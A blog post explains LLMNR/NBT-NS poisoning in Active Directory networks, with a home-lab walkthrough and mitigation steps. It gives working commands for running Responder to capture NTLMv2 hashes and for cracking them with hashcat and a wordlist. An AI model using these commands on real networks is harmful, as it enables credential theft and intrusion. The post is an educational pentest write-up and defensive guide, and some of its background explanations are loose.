Open in app

Sign in

Write

Sign in

LLMNR and NetBIOS Poisoning

Neeraj Ganasala
5 min readDec 31, 2021

LLMNR/NBT-NS poisoning is one of the first tests every pentester checks for while pentesting an internal network. It is one of the very popular Active Directory attacks that involves spoofing an authoritative source on the network by responding to LLMNR requests on UDP 5355 or UDP 137 for NBT-NS.

Active Directory (AD): Active Directory is Microsoft’s directory and identity management service for Windows domain networks. The main function of Active Directory is to enable administrators to manage permissions and control access to network resources. In Active Directory, data is stored as objects, which include users, groups, applications, and devices, and these objects are categorized according to their name and attributes.

For example: In a company, there will be multiple divisions. Every division needs to operate differently based on the requirements and their purpose and the computers are also needed to be configured with the specific required software and settings for their work. And if we need to install new software, we need to install it in every system but this is a very hard and time-consuming job. What if we can make required changes to all the systems at the same time?, this is what Active Directory does.

In Simple words……

Active Directory is a set of computers connected to a single host and all the access and actions are under the host machine(which is a server).

LLMNR & NBT-NS:

LLMNR stands for Link-Local Multicast Name Resolution & NBT-NS stands for NetBIOS Name service, both are a type of DNS and Microsoft windows components that serve as alternative methods to DNS. When DNS fails to identify the host LLMNR/NBT-NS comes to the place and checks wheater the share is available to access or not.

How an attacker can exploit it?

Now that I have talked about how LLMNR works let’s look at what causes LLMNR vulnerable. Unlike DNS, LLMNR will broadcast the message to all the hosts available in the network and ask whether they know that specific address. This is what helps hackers to enter into. As we have discussed above, when a user enters an SMB address DNS will check its server whether the address is reachable or not. If DNS hasn’t found it, LLMNR will check for that address but what if the address is unavailable or doesn’t even exist? Now LLMNR broadcast and asks every machine in the network whether they know about that address then an attacker who is inside that network listens to the requests coming and responds that he knows the corresponding address and asks to send hashes. Now LLMNR/NetBios sends NTLM/NTLMv2 hash to authenticate, once hashes are sent/leaked to the attacker it's very easy to crack the hash using John or Hashcat.

Below is an image of the flow of the attack:

Walkthrough of the Attack:

Before diving into the attack I just want to show you a quick model of my lab setup, I am using a VMWare workstation to run a Ubuntu server and it is connected to windows 7 as a client machine using Kerberos and samba SMB. And also I am using Kali Linux as an attacker machine in the same network(VMware). Below is the illustrated picture of my setup.

Illustrated picture of my lab setup

Step 1:

In the attacker machine (Kali Linux) run Responder to capture the requests coming in the network. By default, it's installed in Kali Linux. Responder according to its GitHub is an “LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP, and basic HTTP authentication”

python Responder.py -I eth0 -rdwv

Step 2:

Login to client windows 7 machine, open My Computer and search for any invalid share address.

For example : //thisisademonistrationofllmnrattack

Step 3:

Now our Kali Linux — attacker machine’s responder would have captured the hash and it looks like as in the below image, now copy the hash and save it in a file.

Step 4:

Run Hashcat to crack the user credential hash using any good word list. (for eg. rockyou.txt)

hashcat -m 5600 hash.txt rockyou.txt

Step 5:

Wait for Hashcat to crack the hash.

Mitigation:

1. Disable LLMNR and NBT-NS:

Disabling LLMNR:

  1. Open the Group Policy Editor in your version of Windows
  2. Navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client
  3. Under DNS Client, make sure that “Turn OFF Multicast Name Resolution” is set to Enabled

Disabling NBT-NS:

  1. Open your Network Connections and view the properties of your network adapter.
  2. Select Internet Protocol Version 4 (TCP/IPv4) and click on Properties.
  3. On the General tab click Advanced and navigate to the WINS tab, then select “Disable NetBIOS over TCP/IP.

2. Use strong Password with combination of special characters, numbers, small, capitals and > 14 digits.

3. Enable SMB signing will stop NLVMv2 relay attacks but its not optimal as it will increase the traffic flow.

Infosec
Info Sec Writeups
Active Directory
Llmnr
Llmnr Poisoning

--

--

Neeraj Ganasala

Written by Neeraj Ganasala

3 Followers

Infosec Research | Bug Bounty | VAPT | More About me: https://neerugana.tech/

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams